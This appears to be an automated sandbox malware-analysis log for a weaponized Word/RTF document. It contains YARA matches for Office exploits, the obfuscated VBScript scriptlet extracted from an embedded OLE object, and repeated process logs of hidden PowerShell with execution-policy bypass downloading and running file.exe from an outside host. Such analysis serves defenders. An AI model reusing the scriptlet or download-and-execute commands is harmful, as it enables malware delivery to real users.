Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622809/\x1Ole10Native' : j....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT..... ...C:\8jkepaD\FZdtfhgYgeghD.scT...<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... 
age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 01007840626
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622893/\x1Ole10Native' : k....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT.....6...C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD.scT.j..<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "0100784062605620861036505630846
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\file.exe
Source: TEPO0015922.doc, type: SAMPLE | Matched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: TEPO0015922.doc, type: SAMPLE | Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: TEPO0015922.doc, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1568, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1832, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_73C32288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 21_2_73BC2288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: String function: 00402C39 appears 52 times
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\file.exeProcess Stats: CPU usage > 98%
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: Number of sections : 12 > 10
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............p.......#.........-.......j.....p.........j.......e.....`Ig.......bw.....................Kn.......,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ...............................................................H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.!..............#G.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ek....................................}.dw....@.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....P.......0.!..............#G.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....G.................ek.....&G.............................}.dw....P.......0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....S.................ek.....&G.............................}.dw............0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ek....................................}.dw....(.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............0.!....._.........................T..... .......................}.dw............ .................,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................ek....................................}.dw.... .......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....k.................ek.....&G.............................}.dw....X.......0.!...............,.....f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .........ek.....&G.............................}.dw.... .......0.!..............#G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................ek....................................}.dw....X.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ................................................................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................!......6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k....................................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw.... .......0................!......".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............B..k....`$..............................}.dw.... .......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............B..k....`$..............................}.dw............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k....x...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0......._.......................x....... .......................}.dw............ ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k....p...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............B..k....`$..............................}.dw....(.......0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k....................................}.dw....`.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.~.....w....... .......B..k....`$..............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k....................................}.dw....(.......0................!..............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
